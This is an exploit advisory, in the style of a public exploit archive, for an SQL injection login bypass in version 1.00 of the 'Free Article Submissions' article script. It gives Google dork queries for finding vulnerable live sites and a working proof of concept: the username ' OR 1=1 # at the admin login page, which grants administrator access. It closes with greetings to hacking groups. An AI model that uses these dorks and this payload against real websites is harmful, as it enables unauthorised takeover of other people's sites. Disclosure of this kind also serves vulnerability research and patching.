40 lines
No EOL
1.5 KiB
Text
40 lines
No EOL
1.5 KiB
Text
# Exploit Title: Free Article Submissions SQL Injection Vulnerability
|
|
# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
|
|
inurl:/category.php?id=2 "Arts & Entertainment"
|
|
# Date: 07/12/2014
|
|
# Exploit Author: BarrabravaZ
|
|
# Vendor Homepage: http://www.articlesetup.com/
|
|
# Software Link: [download link if available]
|
|
# Version: 1.00
|
|
# Tested on: Windows
|
|
|
|
|
|
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
«««:»»» Author will be not responsible for any damage. «««:»»»
|
|
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
x
|
|
x Issue:
|
|
x SQL Injection Bypass Login
|
|
x
|
|
x Risk level: High
|
|
x ~ The remote attacker has the possibility to manage the website.
|
|
x ~ The remote attacker is able to login into website with access level as admin.
|
|
x
|
|
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
|
|
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
##
|
|
## Proof Of Concept:
|
|
## http://127.0.0.1/admin/login.php
|
|
##
|
|
## Username : ' OR 1=1 #
|
|
## Password : barrabravaz
|
|
##
|
|
##
|
|
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
|
|
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
Special thanks to:
|
|
[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
|
|
[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
|
|
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |